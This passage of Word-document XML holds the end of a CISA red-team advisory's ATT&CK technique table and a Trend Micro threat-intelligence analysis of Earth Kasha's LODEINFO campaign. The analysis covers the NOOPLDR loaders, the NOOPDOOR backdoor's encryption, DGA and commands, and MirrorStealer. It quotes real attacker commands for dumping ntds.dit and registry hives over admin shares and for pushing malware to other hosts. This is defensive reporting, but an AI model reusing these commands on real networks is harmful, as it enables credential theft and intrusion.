          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remote Services: SSH T1021.004 The team's acquisition of SSH private keys of user and service accounts, including two highly privileged accounts with root access to hundreds of servers, facilitated unrestricted lateral movement to other Linux hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Software Deployment Tools T1072 Access to an Ansible Tower system provided the team easy access to multiple SBSs.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13: Collection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Technique Title ID Use Data from Information Repositories T1213 The team accessed a database that received information from OT devices to feed monitoring dashboards, which the organization used to make decisions.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14: Command and Control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Technique Title ID Use Ingress Tool Transfer T1105</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team then downloaded and executed a Sliver payload that utilized this proxy to establish command and control.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During Phase II, the team uploaded and executed a well-known malicious file to a target DC system to generate host-based alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer Protocol: Web Protocols T1071.001 In the organization's Linux environment, the red team leveraged HTTPS connections for C2. Proxy: Internal Proxy T1090.001 The team leveraged an open internal HTTPS proxy for their traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer Protocol: File Transfer Protocols T1071.002 The team connected to servers over SMB.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy: External Proxy T1090.002 The team used cloud platforms to create flexible and dynamic redirect servers to send traffic to the team's servers. Encrypted Channel T1573 The team encrypted all data in transit and secured all data at rest through a VPN with multifactor authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy: Domain Fronting T1090.004 The team used domain fronting to disguise outbound traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer Protocol T1071 During Phase II, the team established a session that originated from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.</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15: Exfiltration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Technique Title ID Use Exfiltration Over Alternative Protocol T1048 During Phase II, the team sent a large amount of mock sensitive information to an external host.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16: Impact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Technique Title ID Use Account Access Removal T1531 The team locked out several administrative AD accounts in rapid succession.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.11.21 17:50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-326a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella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LODEINFO is a malware used in attacks targeting mainly Japan since 2019. Trend Micro has been tracking the group as Earth Kasha. We have identified a new campaign connected to this group with significant updates to their strategy, tactics, and arsenals.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Hara Hiroaki November 19, 2024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blog is based on a presentation by the authors at Virus Bulletin 2024. Introduction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LODEINFO is a malware used in attacks targeting mainly Japan since 2019. Trend Micro has been tracking the group as Earth Kasha. While some vendors suspect that the actor using LODEINFO might be APT10, we don't have enough evidence to fully support this speculation. Currently, we view APT10 and Earth Kasha as different entities, although they might be related. To avoid confusion caused by names, we use a new term "APT10 Umbrella," which represents a group of intrusion sets related to APT10 (including APT10 itself).</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Earth Kasha has been known to have targeted public institutions and academics with spear-phishing emails since their emergence. From early 2023 to early 2024, however, we identified a new campaign with significant updates to their strategy, tactics, and arsenals.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 An overview of relationships of Earth Kasha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LODEINFO Since 2023</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new campaign starting in early 2023, Earth Kasha expanded their targets into Japan, Taiwan, and India. Based on the bias of the incident amount, while we believe that Japan is still the main target of Earth Kasha, we observed that a few high-profile organizations in Taiwan and India were targeted. The observed industries under attack are organizations related to advanced technology and government agencies.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Earth Kasha has also employed different Tactics, Techniques, and Procedures (TTPs) in the Initial Access phase, which now exploits public-facing applications such as SSL-VPN and file storage services. We observed that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vulnerabilities of enterprise products, such as Array AG (CVE-2023-28461), Proself (CVE-2023-45727) and FortiOS/FortiProxy (CVE-2023-27997), were abused in the wild. Earth Kasha was changing these vulnerabilities to abuse from time to time. After gaining access, they deployed several backdoors in the victim's network to achieve persistence. These include Cobalt Strike, LODEINFO, and the newly discovered NOOPDOOR, which we will describe later. Observed TTPs in Post-Exploitation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Our comprehensive analysis of the activities in the Post-Exploitation phase has revealed that the primary motivation behind the attack was the theft of the victim's information and data. Earth Kasha first discovered Active Directory configuration and domain user information to achieve this goal using legitimate Microsoft tools, such as csvde.exe, nltest.exe and quser.exe. The following are actual commands used by the adversary. csvde.exe -f all.csv -u nltest.exe /domain_trusts quser.exe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then accessed the file server and tried to find documents related to the system information of the customer's network by simply using "dir" commands recursively. Interestingly, upon checking on their activity, the operator might check the content of the documents manually. The stolen information may help the adversary find the next valuable target.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Earth Kasha then performs several techniques to acquire credentials. One method uses their custom malware, MirrorStealer, to dump stored credentials in applications. MirrorStealer (originally reported by ESET) is a credential dumper targeting multiple applications such as browsers (Chrome, Firefox, Edge and Internet Explorer), email clients (Outlook, Thunderbird, Becky, and Live Mail), Group Policy Preferences and SQL Server Management Studio.</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Since MirrorStealer may be designed to dump credentials on client machines, Earth Kasha used another way to dump OS credentials. We observed that the adversary abused vssadmin to copy registry hives and ntds.dit in the Active Directory server from volume shadow copy. The SAM registry hive contains the NTLM hash of local machine users, while ntds.dit contains the NTLM hash of all the domain users. The following are commands the adversary uses after creating a volume shadow copy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>copy \\&lt;AD_SERVER_IP&gt;\c$\windows\temp\ntds.dit .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>copy \\&lt;AD_SERVER_IP&gt;\c$\windows\temp\system .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>copy \\&lt;AD_SERVER_IP&gt;\c$\windows\temp\sam .</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we couldn't figure out the actual method they abused, we have observed that Earth Kasha successfully compromised domain admin in most cases. After compromising domain admin, they deployed backdoors (LODEINFO or NOOPDOOR) to several machines by copying components over SMB and abusing schetasks.exe or sc.exe to achieve lateral movement. The following are the adversary's actual commands to deploy malicious components over admin shares.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>copy SfsDllSample.exe \\&lt;IP&gt;\c$\windows\temp\SfsDllSample.exe copy SfsDll32.dll \\&lt;IP&gt;\c$\windows\temp\SfsDll32.dll copy mssitlb.xml \\&lt;IP&gt;\C$\Windows\system32\UIAnimation.xml copy ShiftJIS.dat \\&lt;IP&gt;\C$\Windows\system32\ComputerToastIcon.contrast- white.dat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Once the intrusion progressed, Earth Kasha started to exfiltrate the stolen information. The adversary gathered data, including ntds.dit, SYSTEM, SAM registry hives and other interesting files on a single victim machine and compressed these files into a single archive using the makecab command. While we couldn't confirm how these data would be exfiltrated, it might be over the backdoor channel. Earth Kasha also exfiltrated interesting files in the victim network over the RDP session. They copied interesting files to the RDP source host over SMB ("tsclient" is an RDP source host). \\tsclient\C\aaa\All PC List.xlsx \\tsclient\C\aaa\All IP List.xlsx \\tsclient\C\aaa\Network Diagram.xlsx Malware Analysis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previous campaign by Earth Kasha, LODEINFO has been their primary backdoor of choice. In the new campaign, however, we have observed several backdoors, such as Cobalt Strike, LODEINFO and previously undocumented NOOPDOOR. These backdoors were selectively used for each incident.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2. Observed malware in each incident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Possible Cracked Version of Cobalt Strike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early incidents above, Earth Kasha also used Cobalt Strike. Like other adversaries, Cobalt Strike is designed to be executed only in memory. In this case, Earth Kasha used a shellcode loader written in Go, which we dubbed GOSICLOADER. GOSICLOADER is intended to be loaded via DLL side- loading and simply decrypts the embedded payload in the data section using Based64+AES.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3. Execution flow of GOSICLOADER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Upon checking the configuration of the Cobalt Strike beacon, we noticed it could be a cracked version of the Cobalt Strike, known as CSAgent, shared among the Chinese-speaking hacking community. According to the developer of Cobalt Strike, Cobalt Strike beacon embeds watermark and watermark hash to make it difficult to tamper with authorization. CSAgent modifies the watermark to include "666666" by default and uses a watermark hash that matches the one embedded in the observed Cobalt Strike beacon for this campaign. Since the watermark and its hash can be easily tampered with if the adversary knows the algorithm, this modification could be a false flag, but it is still noteworthy.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4. Watermark and watermark hash in configuration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5. Watermark and its hash in CSAgent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LODEINFO</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LODEINFO is a backdoor exclusively used by Earth Kasha since 2019, serving as their primary backdoor. In this new campaign, however, it is just one option among several, showing its adaptability. Since its introduction, LODEINFO has gone through continuous updates, as indicated by its version numbers. In this campaign, we have observed versions v0.6.9, v0.7.1, v0.7.2, and v0.7.3</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6. Version number history of LODEINFO</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the incrementing version number, Earth Kasha has also been updating a procedure to execute LODEINFO. In this new campaign, they deployed three components in the victim machine. They registered the legitimate application (SfsDllSample.exe in Figure 7) as a scheduled task, which will trigger DLL Side-Loading of malicious DLL (SfsDll32.dll in Figure 7).</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7. Execution sequence of LODEINFO</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malicious DLL, which we dubbed LODEINFOLDR (aka FaceLoader by ESET), extracts an encrypted payload embedded in the digital signature of the loaded process and decrypts it by RC4 or XOR. The encrypted payload is embedded in the legitimate digital signature by abusing MS13-098/CVE-2013- 3900.</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8. Embedded encrypted payload and RC4 in digital signature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 distinguish this LODEINFOLDR in the new campaign from the ones we had seen in the previous campaign, and we call this new loader LODEINFOLDR Type 2. At first glance, we thought LODEINFOLDR Type 2 was their new loader developed for the new campaign. Still, after further investigation, we identified that LODEINFOLDR Type 2 looks the same as the loader of LODEINFO used in the LiberalFace campaign in 2022, disclosed by ESET3. This may infer that the same entity has used the same malware since the previous campaign.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Regarding LODEINFO, several backdoor commands were newly supported. "pkill", "ps", "keylog", and "autorun" were added in v0.6.9, and "runas" was newly added in v0.7.1. The backdoor commands supported in v0.6.9 differed from the old ones since these commands were initially added in the previous version, removed in v0.6.3 and added again in v0.6.9. On the other hand, "runas" supported in v0.7.1 is a new one that enables running the processes as a specific user. Since v0.7.2, the "config" command, which is just used to display "Not Available.", has been fully implemented.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>v0.6.9 v0.7.1 v0.7.2 and v0.7.3 command ls rm mv cp cat mkdir send recv memory kill cd ver print ransom (not implemented) comc config pkill ps keylog autorun command ls rm mv cp cat mkdir send recv memory kill cd ver print ransom (not implemented) comc config pkill ps keylog autorun runas command ls rm mv cp cat mkdir send recv memory kill cd ver print ransom (not implemented) comc config pkill ps keylog autorun runas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 Backdoor commands supported by LODEINFO, newly added commands in italics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All the LODEINFO we observed in the new campaign were slightly different in the backdoor command process compared to the LODEINFO in the previous campaign. This LODEINFO type supports running DLL or shellcode in memory without backdoor command processing. After further investigation, we concluded that this type of LODEINF we observed in the new campaign should be the same as the one that ESET calls "The 2nd stage LODEINFO" observed in the LiberalFace campaign. As Figure 9 and Figure 10 show, the LODEINFO in the new campaign directly supports running DLL or shellcode in memory without processing backdoor commands. This evidence may also infer that the same group has been using the same malware since the previous campaign.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9. C&amp;C server response processing of the LODEINFO in the previous campaign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10. C&amp;C server response processing of the 2nd stage LODEINFO</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NOOPLDR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During our investigation, we encountered two different shellcode loaders; one is XML containing C#, and the other is DLL. These two types of shellcode loaders are completely different in the implementation perspective. However, a payload of both is a previously undocumented backdoor that we call NOOPDOOR, which we will describe later. Both loaders adopt a similar strategy to decrypt and store the encrypted payload using the machine's device ID. Based on these similarities, we categorized both as the same variant, which we dubbed NOOPLDR. We distinguish the former XML/C# one as "NOOPLDR Type 1" and DLL one as "NOOPLDR Type 2," respectively. NOOPLDR Type 1 is designed to be executed by Windows' trusted utility tool, MSBuild, as shown in Figure 11.</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11. Execution flow of NOOPLDR Type 1 (XML)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most cases, MSBuild and the target XML file are registered as a Scheduled Task for persistence. MSBuild compiles the inclined C# in XML project on runtime, a key component of NOOPLDR Type 1. The inclined C# code is typically concealed as follows.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12. Example of NOOPLDR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NOOPLDR Type 1 changes its behavior depending on whether it's the first- time execution or otherwise. If it's the first execution, NOOPLDR Type 1 tries to find encrypted data from a hardcoded file path, which differs for each NOOPLDR sample. If it exists, NOOPLDR Type 1 deletes the file after reading the content. The encrypted data consists of a header for checksum, AES key materials and an encrypted body. NOOPLDR Type 1 reads the first 32 bytes, computes the SHA256 hash of the following encrypted body, and then compares the hash with the header to verify if the data is an expected structure. After completing verification, NOOPLDR Type 1 calculates the SHA384 hash of the AES key material following behind the checksum header. The first 32 bytes are used as the AES key, and the later 16 as IV. Finally, NOOPLDR Type 1 decrypts the encrypted payload by AES256-CBC.</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13. Structure of the encrypted data of NOOPLDR Type 1</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The decrypted data has a header containing a 64-bit flag, the payload size, an offset to the payload and the payload data in the following structure.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14. Structure of the decrypted data of NOOPLDR Type 1</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Once the decryption succeeds, NOOPLDR Type 1 tries to store the payload in the registry for stealthy persistence. The encryption algorithm is still AES256-CBC, but the AES key and IV are generated based on a machine's Device ID and a hostname. The device ID is retrieved from the registry key "HKLM\Software\Microsoft\SQMClient\MachineId," which contains the machine's unique GUID. NOOPLDR Type 1 calculates the SHA384 hash of the concatenated Device ID and hostname and follows the same procedure in the decryption routine, splitting the hash value into chunks of 32 bytes and 16 bytes for AES key and IV respectively.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NOOPLDR Type 1 then prepends the SHA256 hash of the encrypted payload and stores it in the registry "(HKLM|HKCU)\Software\License\{HEX}", which "HEX" is a hex string of the last 16 bytes of the SHA256 hash of the hostname. Since this encryption procedure uses a unique value for each infected machine, we need to preserve additional info and data, such as registry hive and hostname, to smoothly decrypt the payload. If NOOPLDR Type 1 successfully stores the payload in the registry, it deletes the encrypted file on a disk. Therefore, in the second and subsequent execution time, NOOPLDR Type 1 reads the registry key and decrypts the payload in the same procedure as the encryption routine.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15. Procedure to store an encrypted payload in the registry by NOOPLDR Type 1</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final step, NOOPLDR Type 1 injects and runs the decrypted payload into a legitimate application, such as rdrleakdiag.exe and tabcal.exe. If NOOPLDR Type 1 fails to store the payload in the registry, it writes the encrypted payload into a disk again and overwrites it with the same timestamp as the built-in kernel32.dll.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Another type of NOOPLDR in the form of a DLL, which we call NOOPLDR Type 2, adopts a similar strategy to Type 1 but implements more stealthy techniques. As Figure 16 illustrates, during the first execution, NOOPLDR Type 2 also decrypts the encrypted payload from a file and stores the encrypted payload in the registry. It injects the decrypted payload into the legitimate application.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16. Execution flow of NOOPLDR Type 2 (DLL)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One of the notable features of NOOPLDR Type 2 is the use of multiple anti- analysis techniques. For instance, it is heavily obfuscated by control flow obfuscation and junk codes, as shown in Figure 17. Earth Kasha has already applied this type of obfuscation technique in the previous campaign, but even before that, it's been popular among China-nexus adversaries, such as APT10 and Twisted Panda.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17. Control Flow Obfuscation (Left) and Junk Code (Right)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the additional anti-analysis technique, most strings are simply encoded by XOR, which is decoded on runtime.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18. String decoding routine by XOR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NOOPLDR Type 2 is designed to be executed via DLL Side-Loading. NOOPLDR Type 2 supports self-installation as Windows Service by running with the "- install" parameter. During the first execution, it loads an encrypted payload named "&lt;LOADER_PROCESS_NAME&gt;_config" in the current working directory, which will be deleted after installation. For instance, if the loader process name is "symstore.exe," the encrypted file would be "symstore.exe_config." The encrypted blob structure is like the Type 1 but slightly different. It doesn't have a checksum section; it simply has 32- byte AES key materials followed by an encrypted payload, as Figure 19 shows. The encrypted payload is encrypted by AES256-CBC. The AES key is generated based on the SHA1 of the first 32 bytes, and IV is the first 16 bytes.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19. Structure of the encrypted data of NOOPLDR Type 2</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Like the NOOPLDR Type 1, the decrypted data has a 0x14 bytes header containing several values used to verify if it's an expected structure, as Figure 20 shows.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20. Structure of the decrypted data of NOOPLDR Type 2</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verification, NOOPLDR Type 2 encrypts the decrypted data again with AES256-CBC but with a different key, which consists of a Device ID string, hardcoded key material in the code section and randomly generated 8-byte hex string and stores it in "HKCU\SOFTWARE\Microsoft\COM3\&lt;RANDOM_HEX_STRTING&gt;," as Figure 21 shows.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21. Procedure to store an encrypted payload in the registry by NOOPLDR Type 2</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second and subsequent execution time, NOOPLDR Type 2 will be executed without the "-install" parameter. Therefore, it skips self- installation and proceeds to the payload decryption routine from the registry. It searches registry data in the registry (HKCU\SOFTWARE\Microsoft\COM3), and if found, it decrypts the encrypted data by the same method in Figure 21 but using the HEX string in the registry key as a part of AES key material.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At last, NOOPLDR Type 2 injects the decrypted payload into legitimate applications, such as wuauclt.exe. This process injection technique is classic, but leverages direct Syscall using NtProtectVirtualMemory, NtWriteVirtualMemory and NtCreateThreadEx. Since Syscall ID can be different on running OS versions, Syscall ID is calculated on runtime.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22. Example of usage of NtWriteVirtualMemory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NOOPDOOR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Now, let's step into the final payload, NOOPDOOR. NOOPDOOR (aka HiddenFace by ESET) is a sophisticated and complex backdoor with the following characteristics: Fully position independent code Supporting active and passive mode communication C&amp;C domain changed daily by a DGA (by default) Proxy-aware TCP communication during working time RSA + multiple symmetric cipher to encrypt the entire C&amp;C communication Supporting build-in functions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+ additional modules for backdoor capabilities Evading in-memory detection by encrypting/decrypting specific functions on runtime Anti-analysis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Due to its complexity, NOOPDOOR should be designed as another backdoor choice, especially for a high-profile target. Based on our records, NOOPDOOR was first observed as a second-stage payload of LODEINFO in 2021, but only in limited cases. And we have not encountered NOOPDOOR until 2023. One of the interesting features of NOOPDOOR is that it supports two channels to communicate with the C&amp;C server, which we call the active and passive modes.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23. Overview architecture of NOOPDOOR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23 shows that NOOPDOOR in active mode communicates over TCP/443 by polling the C&amp;C server. NOOPDOOR in passive mode listens on TCP/47000 to receive commands from remote adversaries. Interestingly, the active and passive modes use different encryption algorithms and backdoor commands, respectively, which means that both channels are incompatible and independent methods of communication from each other. The active mode is executed in a primary thread of NOOPDOOR. Before starting communications with the C&amp;C server, NOOPDOOR checks if the specific analysis tools listed in Appendix A are running in the current machine. If any are found, NOOPDOOR will terminate itself. NOOPDOOR then generates the C&amp;C server's domain using a custom Domain Generation Algorithm (DGA). NOOPDOOR has template URLs like "http://$j[].srmbr\.com/#180" (defanged) that are used to generate the domain, and NOOPDOOR embeds a randomly generated string based on the runtime date into the template URLs. Therefore, a domain can be changed daily (by default, but the lifespan of domains can be changed based on the option). A detailed DGA logic is as follows.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24. Detailed logic of DGA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 have also observed a few samples of NOOPDOOR that embed slightly different types of URLs. The placeholder "$&lt;KEY&gt;," which is a single letter (such as "j") in most cases, can be a "word." In the case we observed, the template URL was like "hxxp://$earth[.]hopto[.]org:443/", in which the "$earth" part is the placeholder. In such a case, the generated domain will be as follows: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25. DGA generation using "word" as the placeholder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the generated domain, NOOPDOOR initiates C&amp;C communication. NOOPDOOR supports HTTP proxy in the victim's environment during business hours (8:30~19:30 from Monday to Friday). C&amp;C communication in the active mode is fully encrypted by a combination of RSA-2048 and symmetric cipher. On initializing a session, NOOPDOOR sends a challenge and randomly selected symmetric cipher ID to the C&amp;C server with encryption by RSA-2048 to negotiate a key for encrypting packets during the following module/command processing. Supported ciphers are DES, 3DES, 2-key 3DES, AES-128-CBC, AES- 192-CBC, AES-256-CBC, RC2, and RC4. After key negotiation, it starts to receive commands and sends a result with encryption by the selected cipher.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26. C&amp;C communication flow of NOOPDOOR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NOOPDOOR operator can execute a loaded module or built-in function through backdoor commands in active mode. The built-in functions that are currently supported are as follows: ID (active mode) Action 3B27D4EEFBC6137C23BD612DC7C4A817 Run program 9AA5BB92E9D1CD212EFB0A5E9149B7E5 Download a file (received from the C&amp;C server) 3C7660B04EE979FDC29CD7BBFDD05F23 Upload a file (sending to the C&amp;C server) 12E2FC6C22B38788D8C1CC2768BD2C76 Read specific file (%SystemRoot%\System32\msra.tlb) 2D3D5C19A771A3606019C8ED1CD47FB5 Change the timestamp of the specified file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 the other hand, C&amp;C communication in passive mode is much simpler. NOOPDOOR creates a new thread for passive mode communication and prepares an incoming connection. NOOPDOOR initially tries to add a new Windows Firewall rule named "Cortana" to allow inbound connection to TCP/470000. C&amp;C communication in passive mode is encrypted by AES-128-CBC with key and IV generated based on the current running datetime. Backdoor commands are also different from the ones in active mode as follows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ID (passive mode) Action 3049 (0x0BE9) Keep alive 9049 (0x2359) Run program 9050 (0x235A) Upload a file (sending to the C&amp;C server) 9051 (0x235B) Download a file (received from the C&amp;C server) 9052 (0x235C) Change working directory 9053 (0x235D) Run shellcode else Returns a message "This function is not supported by server!"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it should be noted that the passive mode may be useless in most cases since the operator can't directly access the listening instance of NOOPDOOR due to a firewall or other network devices in a modern network. The passive mode might be designed for NOOPDOOR being placed in a publicly exposed server (although all the NOOPDOOR have been observed only in a local network so far) or just for testing purposes. In fact, we have observed a few samples of NOOPDOOR that do not implement the passive mode.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 another feature of NOOPDOOR, it supports loading modules from a disk. During initialization, NOOPDOOR looks for a file like "%temp%\{HEX}.tmp," in which the "{HEX}" part is generated from a portion of the SHA256 hash of a combination of the current computer name and username (in UTF-16le). This file contains the modules encrypted by AES-256-CBC. Module blobs consist of metadata, such as information for scheduling, module ID, parameters, and module payload. Due to this feature, NOOPDOOR allows them to execute additional functions at various times (on demand or regularly).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MirrorStealer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MirrorStealer, originally documented by ESET3, is a multi-purpose credential stealer. It is often used in conjunction with NOOPDOOR in cyberattacks. We have observed MirrorStealer in the recent campaign as well. Currently targeted applications are the following.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stored credentials in browsers (Chrome, Firefox, Edge, InternetExplorer) Stored credentials in email clients (Outlook, Thunderbird, Becky, Live Mail) Stored credentials in Group Policy Preferences Recently accessed server and stored credentials in SQL Server Management Studio (mru.dat, SqlStudio.bin)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All the results of stolen credentials are stored in %temp%\31558.TXT as plain text. We observed that the adversary manually checked the outputs using the "touch" command and deleted them with the "del" command via cmd.exe. Attribution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 mentioned earlier, we assess the spear-phishing campaign from 2023 to early 2024 to be attributed to Earth Kasha with medium confidence. To explain the reasoning behind our conclusion, we will analyze several campaigns.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LODEINFO Campaign #1 and #2</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following image illustrates the Diamond Model of two campaigns by Earth Kasha. For convenience, we call the campaign being conducted in 2019 to 2023 using spear-phishing as "LODEINFO Campaign #1" and the campaign being conducted since 2023 targeting public-facing applications as "LODEINFO Campaign #2". The Diamond Model highlights the overlaps between the LODEINFO Campaign #1 and #2, leading us to speculate that these campaigns are operated by the same group because exclusive malware was used in both campaigns. There are no major contradictions in victimology and some parts of TTP.</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27. Comparison between the LODEINFO Campaign #1 and #2 by using the Diamond Model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 the other hand, there are several differences between the LODEINFO Campaign #1 and #2, especially in Initial Access methods, which are completely updated. In Campaign #1, they were using spear-phishing for Initial Access, but in Campaign #2, they were exploiting public-facing applications for Initial Access. Regarding victimology, there are some differences in the targeted industry. The public sector, individuals associated with international affairs, politicians, and researchers in the academic sector were targeted in Campaign #1. However, the private sector, including manufacturing and aviation, hi-tech-related organizations, and government agencies, were targeted in Campaign #2.</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A41APT Campaign and LODEINFO Campaign #2</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 analyzed another campaign, known as "A41APT Campaign" by Earth Tengshe, which is also believed to be related to APT10. This group conducted a campaign targeting several countries, including Japan and Taiwan. The following image uses the Diamond Model to highlight the overlaps between the A41APT Campaign and the LODEINFO Campaign #2.</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28 Comparison between the A41APT Campaign and the LODEINFO Campaign #1 by using the Diamond Model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Interestingly, the A41APT Campaign has a lot of overlaps, especially in TTPs of the Post-Exploitation phase. As the presentation on the A41APT Campaign in JSAC2021 shows, there are similar TTPs in both campaigns, such as exploiting SSL-VPN for Initial Access, schedule task abuse for Persistence, RDP by domain admin account for Lateral Movement, abusing csvde.exe to collect Active Directory account information, and dumping registry hives for Credential Access.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29. Highlighting the overlapped TTPs from the presentation "A41APT Case" in JSAC2021 10</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major difference in these campaigns is the toolsets. Earth Tengshe used custom malware, such as SigLoader, SodaMaster, P8RAT, FYAnti, and Jackpot, which completely differ from Earth Kasha's use in LODEINFO Campaign #2.</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Considering that Earth Tengshe and Earth Kasha are believed to be associated with APT10, both groups may have relationships in TTPs or may share operator resources. Here is a summary of the comparison between the A41APT Campaign, the LODEINFO Campaign #1 and #2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
